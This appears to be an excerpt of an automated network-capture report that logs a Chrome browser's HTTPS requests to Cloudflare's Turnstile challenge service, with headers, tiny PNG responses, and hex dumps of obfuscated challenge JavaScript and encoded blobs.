                                                      2024-03-05 13:24:37 UTC1369INData Raw: 31 35 39 34 29 5d 3d 69 6b 28 32 30 31 31 29 2c 67 6e 5b 69 6b 28 39 36 38 29 5d 3d 69 6b 28 31 37 30 31 29 2c 67 6e 5b 69 6b 28 32 30 34 30 29 5d 3d 69 6b 28 34 30 38 29 2c 67 6e 5b 69 6b 28 39 31 37 29 5d 3d 69 6b 28 39 35 39 29 2c 67 6e 5b 69 6b 28 31 30 34 33 29 5d 3d 69 6b 28 35 34 32 29 2c 67 6e 5b 69 6b 28 37 32 38 29 5d 3d 69 6b 28 31 35 31 32 29 2c 67 6e 5b 69 6b 28 31 33 33 35 29 5d 3d 69 6b 28 32 30 36 30 29 2c 67 6e 5b 69 6b 28 31 38 37 30 29 5d 3d 69 6b 28 31 32 39 34 29 2c 67 6e 5b 69 6b 28 32 31 34 35 29 5d 3d 69 6b 28 31 37 32 39 29 2c 67 6e 5b 69 6b 28 31 35 38 33 29 5d 3d 69 6b 28 31 33 34 32 29 2c 67 6e 5b 69 6b 28 31 37 37 32 29 5d 3d 69 6b 28 31 38 39 30 29 2c 67 6e 5b 69 6b 28 35 31 37 29 5d 3d 69 6b 28 31 33 35 32 29 2c 67 6e 5b 69
                                                      Data Ascii: 1594)]=ik(2011),gn[ik(968)]=ik(1701),gn[ik(2040)]=ik(408),gn[ik(917)]=ik(959),gn[ik(1043)]=ik(542),gn[ik(728)]=ik(1512),gn[ik(1335)]=ik(2060),gn[ik(1870)]=ik(1294),gn[ik(2145)]=ik(1729),gn[ik(1583)]=ik(1342),gn[ik(1772)]=ik(1890),gn[ik(517)]=ik(1352),gn[i
                                                      2024-03-05 13:24:37 UTC1369INData Raw: 28 35 33 38 29 5d 3d 69 6b 28 31 37 31 34 29 2c 67 70 5b 69 6b 28 31 38 37 30 29 5d 3d 69 6b 28 33 36 34 29 2c 67 70 5b 69 6b 28 31 38 39 31 29 5d 3d 69 6b 28 31 39 37 37 29 2c 67 70 5b 69 6b 28 32 31 34 35 29 5d 3d 69 6b 28 32 37 32 29 2c 67 70 5b 69 6b 28 31 35 38 33 29 5d 3d 69 6b 28 31 34 39 39 29 2c 67 70 5b 69 6b 28 31 37 37 32 29 5d 3d 69 6b 28 31 37 36 37 29 2c 67 70 5b 69 6b 28 35 31 37 29 5d 3d 69 6b 28 31 36 39 37 29 2c 67 70 5b 69 6b 28 31 32 36 36 29 5d 3d 69 6b 28 31 38 35 29 2c 67 70 5b 69 6b 28 35 37 31 29 5d 3d 69 6b 28 31 39 32 34 29 2c 67 70 5b 69 6b 28 31 31 33 38 29 5d 3d 69 6b 28 32 31 34 30 29 2c 67 70 5b 69 6b 28 31 36 35 36 29 5d 3d 69 6b 28 32 33 34 29 2c 67 70 5b 69 6b 28 31 31 30 33 29 5d 3d 69 6b 28 31 38 30 29 2c 67 70 5b 69
                                                      Data Ascii: (538)]=ik(1714),gp[ik(1870)]=ik(364),gp[ik(1891)]=ik(1977),gp[ik(2145)]=ik(272),gp[ik(1583)]=ik(1499),gp[ik(1772)]=ik(1767),gp[ik(517)]=ik(1697),gp[ik(1266)]=ik(185),gp[ik(571)]=ik(1924),gp[ik(1138)]=ik(2140),gp[ik(1656)]=ik(234),gp[ik(1103)]=ik(180),gp[i
                                                      2024-03-05 13:24:37 UTC1369INData Raw: 3d 69 6b 28 38 32 34 29 2c 67 71 5b 69 6b 28 31 36 35 36 29 5d 3d 69 6b 28 37 37 37 29 2c 67 71 5b 69 6b 28 31 36 32 38 29 5d 3d 69 6b 28 32 31 35 38 29 2c 67 71 5b 69 6b 28 34 31 39 29 5d 3d 69 6b 28 32 36 30 29 2c 67 71 5b 69 6b 28 31 35 35 36 29 5d 3d 69 6b 28 31 33 32 37 29 2c 67 71 5b 69 6b 28 32 30 36 29 5d 3d 69 6b 28 34 34 34 29 2c 67 71 5b 69 6b 28 31 35 36 36 29 5d 3d 69 6b 28 31 30 37 30 29 2c 67 71 5b 69 6b 28 31 33 33 39 29 5d 3d 69 6b 28 32 31 36 33 29 2c 67 71 5b 69 6b 28 32 34 39 29 5d 3d 69 6b 28 35 38 31 29 2c 67 71 5b 69 6b 28 32 31 33 38 29 5d 3d 69 6b 28 31 30 35 31 29 2c 67 71 5b 69 6b 28 32 30 32 33 29 5d 3d 69 6b 28 31 36 35 35 29 2c 67 71 5b 69 6b 28 31 36 33 35 29 5d 3d 69 6b 28 31 39 30 29 2c 67 72 3d 7b 7d 2c 67 72 5b 69 6b 28
                                                      Data Ascii: =ik(824),gq[ik(1656)]=ik(777),gq[ik(1628)]=ik(2158),gq[ik(419)]=ik(260),gq[ik(1556)]=ik(1327),gq[ik(206)]=ik(444),gq[ik(1566)]=ik(1070),gq[ik(1339)]=ik(2163),gq[ik(249)]=ik(581),gq[ik(2138)]=ik(1051),gq[ik(2023)]=ik(1655),gq[ik(1635)]=ik(190),gr={},gr[ik(
                                                      2024-03-05 13:24:37 UTC1369INData Raw: 5d 3d 69 6b 28 35 30 33 29 2c 67 73 5b 69 6b 28 31 36 33 35 29 5d 3d 69 6b 28 31 39 36 39 29 2c 67 74 3d 7b 7d 2c 67 74 5b 69 6b 28 36 39 37 29 5d 3d 69 6b 28 31 32 35 37 29 2c 67 74 5b 69 6b 28 36 36 33 29 5d 3d 69 6b 28 31 31 30 37 29 2c 67 74 5b 69 6b 28 31 38 31 38 29 5d 3d 69 6b 28 33 30 32 29 2c 67 74 5b 69 6b 28 31 35 39 34 29 5d 3d 69 6b 28 33 39 35 29 2c 67 74 5b 69 6b 28 39 36 38 29 5d 3d 69 6b 28 31 30 39 35 29 2c 67 74 5b 69 6b 28 32 30 34 30 29 5d 3d 69 6b 28 31 36 35 39 29 2c 67 74 5b 69 6b 28 39 31 37 29 5d 3d 69 6b 28 31 35 33 39 29 2c 67 74 5b 69 6b 28 31 30 34 33 29 5d 3d 69 6b 28 36 31 33 29 2c 67 74 5b 69 6b 28 37 32 38 29 5d 3d 69 6b 28 32 34 35 29 2c 67 74 5b 69 6b 28 31 33 33 35 29 5d 3d 69 6b 28 31 32 31 37 29 2c 67 74 5b 69 6b 28
                                                      Data Ascii: ]=ik(503),gs[ik(1635)]=ik(1969),gt={},gt[ik(697)]=ik(1257),gt[ik(663)]=ik(1107),gt[ik(1818)]=ik(302),gt[ik(1594)]=ik(395),gt[ik(968)]=ik(1095),gt[ik(2040)]=ik(1659),gt[ik(917)]=ik(1539),gt[ik(1043)]=ik(613),gt[ik(728)]=ik(245),gt[ik(1335)]=ik(1217),gt[ik(


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      15192.168.2.549728104.17.3.1844433472C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2024-03-05 13:24:37 UTC786OUTGET /cdn-cgi/challenge-platform/h/g/cmg/1/wh0E0SXYnx6pTBdJW%2Fl926I%2BPRUplRdtQz3K9lHXs%2Fs%3D HTTP/1.1
                                                      Host: challenges.cloudflare.com
                                                      Connection: keep-alive
                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                      sec-ch-ua-mobile: ?0
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      sec-ch-ua-platform: "Windows"
                                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                      Sec-Fetch-Site: same-origin
                                                      Sec-Fetch-Mode: no-cors
                                                      Sec-Fetch-Dest: image
                                                      Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/rdp8q/0x4AAAAAAADnPIDROrmt1Wwj/light/normal
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2024-03-05 13:24:37 UTC248INHTTP/1.1 200 OK
                                                      Date: Tue, 05 Mar 2024 13:24:37 GMT
                                                      Content-Type: image/png
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      cache-control: max-age=2629800, public
                                                      Server: cloudflare
                                                      CF-RAY: 85fa6d64ce826a5e-EWR
                                                      alt-svc: h3=":443"; ma=86400
                                                      2024-03-05 13:24:37 UTC67INData Raw: 33 64 0d 0a 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 02 00 00 00 02 08 02 00 00 00 fd d4 9a 73 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82 0d 0a
                                                      Data Ascii: 3dPNGIHDRsIDAT$IENDB`
                                                      2024-03-05 13:24:37 UTC5INData Raw: 30 0d 0a 0d 0a
                                                      Data Ascii: 0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      16192.168.2.549729104.17.3.1844433472C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2024-03-05 13:24:37 UTC438OUTGET /cdn-cgi/challenge-platform/h/g/cmg/1/wh0E0SXYnx6pTBdJW%2Fl926I%2BPRUplRdtQz3K9lHXs%2Fs%3D HTTP/1.1
                                                      Host: challenges.cloudflare.com
                                                      Connection: keep-alive
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      Accept: */*
                                                      Sec-Fetch-Site: none
                                                      Sec-Fetch-Mode: cors
                                                      Sec-Fetch-Dest: empty
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2024-03-05 13:24:37 UTC248INHTTP/1.1 200 OK
                                                      Date: Tue, 05 Mar 2024 13:24:37 GMT
                                                      Content-Type: image/png
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      cache-control: max-age=2629800, public
                                                      Server: cloudflare
                                                      CF-RAY: 85fa6d67f8970f4a-EWR
                                                      alt-svc: h3=":443"; ma=86400
                                                      2024-03-05 13:24:37 UTC67INData Raw: 33 64 0d 0a 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 02 00 00 00 02 08 02 00 00 00 fd d4 9a 73 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82 0d 0a
                                                      Data Ascii: 3dPNGIHDRsIDAT$IENDB`
                                                      2024-03-05 13:24:37 UTC5INData Raw: 30 0d 0a 0d 0a
                                                      Data Ascii: 0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      17192.168.2.549730104.17.3.1844433472C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2024-03-05 13:24:37 UTC917OUTPOST /cdn-cgi/challenge-platform/h/g/flow/ov1/1183635583:1709641629:fYb9hZweqxu5iZMV1wvhRAEVl-boZlvEU6H59iz174E/85fa6d617a504235/e4bc76bcbb19b36 HTTP/1.1
                                                      Host: challenges.cloudflare.com
                                                      Connection: keep-alive
                                                      Content-Length: 3194
                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                      Content-type: application/x-www-form-urlencoded
                                                      sec-ch-ua-mobile: ?0
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      CF-Challenge: e4bc76bcbb19b36
                                                      sec-ch-ua-platform: "Windows"
                                                      Accept: */*
                                                      Origin: https://challenges.cloudflare.com
                                                      Sec-Fetch-Site: same-origin
                                                      Sec-Fetch-Mode: cors
                                                      Sec-Fetch-Dest: empty
                                                      Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/rdp8q/0x4AAAAAAADnPIDROrmt1Wwj/light/normal
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2024-03-05 13:24:37 UTC3194OUTData Raw: 76 5f 38 35 66 61 36 64 36 31 37 61 35 30 34 32 33 35 3d 61 4c 49 4f 33 4f 6c 4f 6d 4f 4f 4f 52 4f 46 7a 25 32 62 32 68 2b 66 78 63 34 59 41 66 36 2b 59 2b 75 6a 78 65 77 53 2b 37 69 2b 4c 4f 34 53 49 2b 76 4b 6d 65 69 2b 65 4f 66 34 4b 6e 2b 4b 4f 4d 31 36 49 2b 75 2b 61 73 53 2b 52 2b 70 4c 2b 6f 45 51 78 72 4b 45 2b 66 5a 56 2b 47 4f 63 35 2b 5a 66 56 4c 35 2b 5a 7a 2b 63 75 2b 36 42 67 55 58 65 2b 54 47 4c 2b 4a 58 53 66 70 54 62 33 6b 35 2b 5a 45 38 49 2b 37 47 39 54 2b 4b 6f 6f 39 57 4f 66 2b 69 47 55 34 2b 2b 56 2b 43 45 66 7a 6d 78 2b 55 7a 65 53 69 59 46 56 2b 65 72 53 6c 79 49 47 52 68 49 6c 35 36 33 41 53 4f 2b 6d 69 69 59 69 2b 69 34 2b 4c 4f 4b 56 2b 31 4c 47 2b 70 5a 79 73 6d 6b 77 4a 69 31 39 53 46 79 36 69 32 36 56 6f 43 35 49 73 57 57 6b
                                                      Data Ascii: v_85fa6d617a504235=aLIO3OlOmOOOROFz%2b2h+fxc4YAf6+Y+ujxewS+7i+LO4SI+vKmei+eOf4Kn+KOM16I+u+asS+R+pL+oEQxrKE+fZV+GOc5+ZfVL5+Zz+cu+6BgUXe+TGL+JXSfpTb3k5+ZE8I+7G9T+Koo9WOf+iGU4++V+CEfzmx+UzeSiYFV+erSlyIGRhIl563ASO+miiYi+i4+LOKV+1LG+pZysmkwJi19SFy6i26VoC5IsWWk
                                                      2024-03-05 13:24:38 UTC735INHTTP/1.1 200 OK
                                                      Date: Tue, 05 Mar 2024 13:24:37 GMT
                                                      Content-Type: text/plain; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      cf-chl-gen: jofPUu+rEuWd2rNCGHuhcIm3E4uZs5ihPyJ/lh3X94KKKVJfyIGVXUtoJqjXqR/jM2lkvTIEfb6hftgbVE0Yduq78GhXFLuw9RvoCg3HTPJHDSFLWfTqBjFpyXxHaqzlzoKr6Nblk9/42PJtM1TgUuJdik359dJ08/ZwHmqlAOaAJQQySIRTGK7LKyaOj9psNkXSqKMjYQSnKYsppZa0epTyNVSuAymoh1cIfPrbGVyx1XvM+93sjSKyY7uOao2vKt8U4eg39xdjimC8YAC8bhGwmuH9AjXN9FvjBmySumYHH8z5iXCwgiRzvkWisMCdCDijJE3GePOp1qe92JmNINafdNdmd76ng37BsMZMF4to5Uatkfw8oC2nV2WC6nAY10Thnh5Fmrzq+kNQnufoa1VK9b/QUOrnvoa+jBdmKGwo6eNycvw0i58iXooiBm+IERtkXOprA5UlW/XaVWSYvQ==$bT/VUR0ze5590LHr/m1jsg==
                                                      Server: cloudflare
                                                      CF-RAY: 85fa6d68782e7cfc-EWR
                                                      alt-svc: h3=":443"; ma=86400
                                                      2024-03-05 13:24:38 UTC634INData Raw: 37 63 63 62 0d 0a 70 6e 61 4b 6c 72 43 33 67 4a 6e 45 72 33 79 6c 73 62 53 61 69 38 6d 67 69 6f 75 78 69 71 50 4e 74 4c 54 4c 78 4e 6e 5a 73 4d 2f 54 72 4a 61 61 7a 37 47 38 72 37 61 35 73 74 6e 6f 78 72 4f 39 72 4b 4f 32 77 4c 2b 6a 73 4d 72 47 39 4b 36 78 74 2f 62 6c 78 39 58 39 2f 50 48 63 38 2f 47 38 30 65 53 39 35 50 76 61 36 64 67 4e 39 77 6a 73 45 66 73 55 33 67 44 55 30 52 45 53 45 68 76 36 43 75 7a 33 33 77 33 61 34 50 51 63 33 50 58 33 4a 2b 58 6d 36 52 38 6b 4b 76 34 6e 35 7a 4d 68 41 79 55 49 43 68 48 77 2b 68 30 56 47 6a 49 4d 48 7a 2f 36 46 54 34 67 52 55 50 36 4e 30 68 47 47 43 55 38 55 51 4e 53 55 55 51 78 4d 31 49 32 4d 6b 63 6a 4c 6a 35 48 4a 79 41 73 56 68 31 65 49 46 64 5a 48 7a 31 46 4a 69 4a 43 4f 6d 30 72 52 6e 49 71 53 79 78 69 51
                                                      Data Ascii: 7ccbpnaKlrC3gJnEr3ylsbSai8mgiouxiqPNtLTLxNnZsM/TrJaaz7G8r7a5stnoxrO9rKO2wL+jsMrG9K6xt/blx9X9/PHc8/G80eS95Pva6dgN9wjsEfsU3gDU0RESEhv6Cuz33w3a4PQc3PX3J+Xm6R8kKv4n5zMhAyUIChHw+h0VGjIMHz/6FT4gRUP6N0hGGCU8UQNSUUQxM1I2MkcjLj5HJyAsVh1eIFdZHz1FJiJCOm0rRnIqSyxiQ
                                                      2024-03-05 13:24:38 UTC1369INData Raw: 62 47 5a 68 59 47 56 6e 56 30 36 54 62 6c 56 64 6c 48 57 6a 58 32 56 37 70 48 6d 71 71 48 71 70 61 58 61 68 6f 59 43 64 68 70 42 74 6f 36 2b 55 64 34 69 48 65 48 65 52 75 35 43 4f 67 4c 53 75 6e 4d 4b 35 67 72 32 49 78 61 79 34 6a 59 69 36 72 49 6a 48 79 4b 61 33 78 4b 32 6f 72 38 53 54 30 4c 79 30 6c 74 71 77 6e 37 44 6b 76 75 48 69 6e 38 54 6c 79 4d 4b 67 7a 74 76 69 35 72 7a 6d 73 63 36 32 7a 39 6a 7a 36 37 50 61 76 4e 32 2f 76 39 76 50 30 39 72 75 42 76 76 63 38 76 72 34 35 77 4c 4f 77 73 77 52 35 73 37 76 7a 68 66 35 30 65 54 36 2b 39 54 51 36 39 7a 2b 2f 41 41 63 39 50 34 6c 48 66 33 6a 43 4f 6b 74 42 66 72 6d 4d 65 51 4c 43 43 2f 30 4e 42 67 7a 39 6a 6b 34 50 43 77 35 2b 52 6b 42 49 6b 52 43 51 45 46 46 41 45 51 31 47 30 35 41 42 30 56 54 4b 45 55
                                                      Data Ascii: bGZhYGVnV06TblVdlHWjX2V7pHmqqHqpaXahoYCdhpBto6+Ud4iHeHeRu5COgLSunMK5gr2Ixay4jYi6rIjHyKa3xK2or8ST0Ly0ltqwn7DkvuHin8TlyMKgztvi5rzmsc62z9jz67PavN2/v9vP09ruBvvc8vr45wLOwswR5s7vzhf50eT6+9TQ69z+/AAc9P4lHf3jCOktBfrmMeQLCC/0NBgz9jk4PCw5+RkBIkRCQEFFAEQ1G05AB0VTKEU
                                                      2024-03-05 13:24:38 UTC1369INData Raw: 33 31 74 62 35 2b 42 6e 70 6d 6b 59 5a 71 53 6d 46 71 4b 6e 58 4e 32 71 6d 78 36 68 71 79 68 72 33 2b 6f 6b 6e 2b 54 72 70 65 44 72 72 79 50 6c 4b 79 7a 75 34 75 34 76 4d 56 2f 6e 4c 36 6b 78 6f 53 61 6f 4c 69 47 70 4d 37 45 6f 36 37 4d 73 64 54 47 78 4c 47 36 32 4a 69 30 7a 64 79 38 79 39 2f 63 72 71 43 33 33 36 58 66 74 62 66 48 75 63 54 68 32 72 44 49 33 65 53 33 73 2b 4c 33 33 4d 66 76 2b 50 33 49 73 2f 37 74 31 74 50 50 78 65 48 44 79 75 62 4b 7a 50 72 48 2f 75 67 46 41 41 76 4d 42 2b 2f 78 38 65 77 63 44 74 33 33 43 4f 73 62 33 2f 72 74 2f 68 45 4a 35 2f 7a 67 4b 2f 37 36 43 67 72 2b 36 77 50 72 42 42 63 6a 47 44 63 46 4c 76 51 71 4f 52 77 61 4b 54 2f 30 51 67 49 50 50 54 4d 6e 49 7a 5a 45 48 42 73 49 48 68 70 42 55 56 52 45 44 69 42 48 49 56 6c 4d
                                                      Data Ascii: 31tb5+BnpmkYZqSmFqKnXN2qmx6hqyhr3+okn+TrpeDrryPlKyzu4u4vMV/nL6kxoSaoLiGpM7Eo67MsdTGxLG62Ji0zdy8y9/crqC336XftbfHucTh2rDI3eS3s+L33Mfv+P3Is/7t1tPPxeHDyubKzPrH/ugFAAvMB+/x8ewcDt33COsb3/rt/hEJ5/zgK/76Cgr+6wPrBBcjGDcFLvQqORwaKT/0QgIPPTMnIzZEHBsIHhpBUVREDiBHIVlM
                                                      2024-03-05 13:24:38 UTC1369INData Raw: 39 35 63 4a 53 54 66 6e 36 59 6f 6e 2b 64 64 6f 65 6e 6a 71 4a 6f 73 49 2b 71 6b 4b 69 68 63 5a 4b 44 6b 48 79 47 6e 72 5a 2f 65 35 2b 4d 67 58 37 43 77 70 79 42 68 61 69 73 71 36 6e 52 72 71 2b 67 79 72 4b 65 31 72 4f 51 70 64 6e 57 71 4b 69 34 74 4c 32 33 34 64 76 45 70 4f 50 66 35 4e 76 44 33 39 36 33 35 65 44 42 34 64 79 39 77 4c 4b 77 78 75 69 73 32 74 58 2b 75 4e 37 4b 76 62 6d 38 7a 50 4c 36 35 64 72 37 32 38 66 6e 37 65 76 73 79 2f 49 48 30 51 51 57 31 66 63 53 38 50 58 61 48 66 6a 70 43 41 6e 70 2b 78 48 73 47 41 44 64 41 53 48 32 46 67 58 6e 4c 67 51 77 4c 77 6e 72 46 50 34 58 47 51 45 6a 46 6a 77 54 39 66 51 59 38 68 45 58 2b 68 6b 6e 45 30 63 45 49 43 4d 47 53 54 38 6a 51 41 6f 52 4d 30 45 68 44 44 67 67 4c 79 68 4d 56 52 63 70 59 44 49 30 54
                                                      Data Ascii: 95cJSTfn6Yon+ddoenjqJosI+qkKihcZKDkHyGnrZ/e5+MgX7CwpyBhaisq6nRrq+gyrKe1rOQpdnWqKi4tL234dvEpOPf5NvD39635eDB4dy9wLKwxuis2tX+uN7Kvbm8zPL65dr728fn7evsy/IH0QQW1fcS8PXaHfjpCAnp+xHsGADdASH2FgXnLgQwLwnrFP4XGQEjFjwT9fQY8hEX+hknE0cEICMGST8jQAoRM0EhDDggLyhMVRcpYDI0T
                                                      2024-03-05 13:24:38 UTC1369INData Raw: 68 6c 58 71 55 5a 61 6d 43 6d 4b 69 72 6d 34 68 76 64 4b 79 6b 73 58 68 34 65 4a 57 75 6b 58 39 36 65 4c 75 6b 65 37 43 47 6b 58 39 38 6f 35 32 5a 7a 59 6d 71 6a 4b 65 79 6b 5a 47 73 31 73 65 7a 6b 62 58 56 32 73 65 63 33 2b 4b 67 7a 63 7a 54 74 38 43 78 74 62 75 6e 78 37 37 59 7a 63 6a 51 72 73 6e 31 35 62 50 50 35 4e 53 32 2b 66 54 6f 37 64 33 31 74 2f 4b 39 2b 51 58 53 38 2b 45 44 36 51 79 2b 41 63 7a 6f 7a 66 44 61 79 66 34 58 36 73 6e 73 36 4e 62 35 32 4f 37 76 38 2b 33 78 2f 52 4c 77 45 50 49 6e 46 78 58 7a 47 66 77 63 39 79 34 42 49 79 45 44 44 69 67 77 45 7a 72 72 4a 52 77 38 2b 67 6b 79 2b 68 76 38 44 7a 6f 4f 51 69 63 38 50 44 4d 47 46 6b 45 38 4d 45 52 46 4f 79 49 79 45 78 42 59 52 31 51 78 53 54 6b 36 50 46 74 56 56 44 4e 66 4e 30 4d 78 52 6b
                                                      Data Ascii: hlXqUZamCmKirm4hvdKyksXh4eJWukX96eLuke7CGkX98o52ZzYmqjKeykZGs1sezkbXV2sec3+KgzczTt8Cxtbunx77YzcjQrsn15bPP5NS2+fTo7d31t/K9+QXS8+ED6Qy+AczozfDayf4X6sns6Nb52O7v8+3x/RLwEPInFxXzGfwc9y4BIyEDDigwEzrrJRw8+gky+hv8DzoOQic8PDMGFkE8MERFOyIyExBYR1QxSTk6PFtVVDNfN0MxRk
                                                      2024-03-05 13:24:38 UTC1369INData Raw: 61 47 65 72 73 32 78 39 69 4c 4f 45 75 6e 65 61 76 4c 61 76 6f 4d 43 4d 77 61 32 4e 75 49 61 58 73 35 4c 4a 68 72 65 32 68 6f 2b 35 70 64 4b 4e 78 74 61 4e 74 4d 65 7a 70 72 54 4b 74 36 6d 33 30 72 44 55 6e 4e 33 6d 75 64 76 69 34 62 66 41 37 4c 69 38 34 73 50 44 7a 71 2b 30 74 50 50 43 72 37 4b 73 79 74 50 46 36 39 62 79 79 39 76 74 37 37 77 43 2b 4f 57 37 42 77 30 48 37 65 6e 50 33 41 72 53 35 77 72 68 43 65 55 55 45 42 6a 37 2b 77 7a 77 49 41 38 67 39 66 77 45 34 78 41 70 4a 41 67 70 43 76 6f 44 2f 4f 62 76 38 53 34 68 36 77 34 6d 4f 51 34 46 4f 79 67 76 4a 6a 48 78 4b 78 77 34 4a 43 4a 46 2f 41 4e 46 45 67 6f 6c 48 45 63 66 4d 51 73 72 54 6a 41 77 4c 68 51 51 4e 78 51 76 54 56 4a 55 47 6b 77 34 58 53 45 74 54 6c 6b 6d 5a 43 55 69 56 6b 4a 66 4b 56 6c
                                                      Data Ascii: aGers2x9iLOEuneavLavoMCMwa2NuIaXs5LJhre2ho+5pdKNxtaNtMezprTKt6m30rDUnN3mudvi4bfA7Li84sPDzq+0tPPCr7KsytPF69byy9vt77wC+OW7Bw0H7enP3ArS5wrhCeUUEBj7+wzwIA8g9fwE4xApJAgpCvoD/Obv8S4h6w4mOQ4FOygvJjHxKxw4JCJF/ANFEgolHEcfMQsrTjAwLhQQNxQvTVJUGkw4XSEtTlkmZCUiVkJfKVl
                                                      2024-03-05 13:24:38 UTC1369INData Raw: 36 2b 31 6d 49 65 52 72 62 32 64 75 5a 47 58 66 5a 47 45 73 62 53 57 6c 63 6a 49 78 4c 54 49 77 4b 4b 70 6d 63 76 4b 69 36 48 4d 30 64 6a 57 74 61 65 6b 30 36 66 53 32 62 2b 38 75 73 2f 5a 77 4c 57 6b 75 73 6a 62 70 36 65 38 77 2b 2f 42 71 75 69 71 37 4c 4c 42 78 39 50 35 39 75 7a 46 31 2b 6a 4b 31 63 77 41 2b 74 44 61 2f 75 4c 53 41 50 62 30 2f 51 6e 77 45 52 44 6a 35 75 62 65 38 4f 58 35 44 51 50 5a 35 77 67 67 37 66 41 41 46 78 49 6a 34 77 38 67 45 78 72 37 36 52 6b 6a 4a 69 38 4a 44 67 41 7a 49 41 4d 6b 4c 6a 45 6a 4e 68 45 73 4b 44 38 31 4e 54 41 61 4f 54 64 48 41 42 6f 6a 53 6a 38 39 43 6b 34 67 47 53 68 43 55 69 6b 77 4b 30 5a 4e 4b 6b 31 63 4d 43 55 56 56 56 63 76 48 54 42 65 4a 45 38 33 50 6d 63 79 52 32 68 4f 5a 69 55 38 62 46 70 67 52 54 45 75
                                                      Data Ascii: 6+1mIeRrb2duZGXfZGEsbSWlcjIxLTIwKKpmcvKi6HM0djWtaek06fS2b+8us/ZwLWkusjbp6e8w+/Bquiq7LLBx9P59uzF1+jK1cwA+tDa/uLSAPb0/QnwERDj5ube8OX5DQPZ5wgg7fAAFxIj4w8gExr76RkjJi8JDgAzIAMkLjEjNhEsKD81NTAaOTdHABojSj89Ck4gGShCUikwK0ZNKk1cMCUVVVcvHTBeJE83PmcyR2hOZiU8bFpgRTEu
                                                      2024-03-05 13:24:38 UTC1369INData Raw: 31 32 75 58 69 2f 74 59 32 4f 6d 37 32 41 6c 63 50 43 74 73 57 6a 69 4d 54 41 7a 4b 79 70 72 63 57 71 79 74 4b 72 30 36 37 59 30 4a 6a 58 32 4a 33 56 74 74 4b 6b 33 74 37 62 73 64 2f 69 77 73 6a 45 75 38 6e 4e 70 4f 4b 78 7a 37 2f 43 7a 4d 50 78 78 4c 58 34 33 2f 62 53 7a 50 76 56 7a 4f 48 30 41 64 58 70 39 51 44 45 79 39 62 58 44 2f 6e 6d 42 76 33 6e 39 65 30 55 31 76 6e 6c 2b 66 72 35 45 52 63 64 36 2b 73 56 2b 66 51 59 48 43 67 47 48 51 62 34 41 66 77 4b 41 75 38 6b 38 53 59 4d 41 41 30 36 4c 68 49 54 4b 66 59 34 45 2f 73 34 46 77 30 34 51 54 34 57 47 68 55 74 46 78 38 64 4b 45 38 6d 54 30 4a 4a 44 43 4a 4d 56 56 67 56 4d 42 6c 4f 4c 46 64 58 4e 6a 6b 64 58 56 73 33 57 46 55 6b 4e 31 52 46 54 6d 59 74 58 57 64 4d 55 7a 4a 49 61 57 46 55 57 6c 70 51 64
                                                      Data Ascii: 12uXi/tY2Om72AlcPCtsWjiMTAzKyprcWqytKr067Y0JjX2J3VttKk3t7bsd/iwsjEu8nNpOKxz7/CzMPxxLX43/bSzPvVzOH0AdXp9QDEy9bXD/nmBv3n9e0U1vnl+fr5ERcd6+sV+fQYHCgGHQb4AfwKAu8k8SYMAA06LhITKfY4E/s4Fw04QT4WGhUtFx8dKE8mT0JJDCJMVVgVMBlOLFdXNjkdXVs3WFUkN1RFTmYtXWdMUzJIaWFUWlpQd
